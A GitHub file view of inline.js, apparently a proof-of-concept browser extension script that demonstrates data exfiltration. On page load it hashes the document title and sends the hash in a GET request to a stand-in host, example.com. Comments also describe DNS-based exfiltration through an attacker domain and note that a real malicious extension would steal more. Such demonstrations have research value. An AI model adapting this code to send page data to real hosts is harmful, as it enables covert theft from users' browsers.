-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathinline.js
37 lines (34 loc) · 1.51 KB
/
inline.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
function exfil(str) {
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
// and probably a thousand other methods. But this one is easy.
var buffer = new TextEncoder("utf-8").encode(str);
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
function callUrl(buffer) {
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
// except it's example.com so w/e
var digest = hex(buffer);
var url = "https://example.com/" + digest;
console.log("Exfiltrating data to " + url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", url, true);
xmlHttp.send( null);
return digest;
}
function hex(buffer) {
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
var hexCodes = [];
var view = new DataView(buffer);
for (var i = 0; i < view.byteLength; i += 4) {
var value = view.getUint32(i)
var stringValue = value.toString(16)
var padding = '00000000'
var paddedValue = (padding + stringValue).slice(-padding.length)
hexCodes.push(paddedValue);
}
var athing = hexCodes.join("");
return hexCodes.join("");
}
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);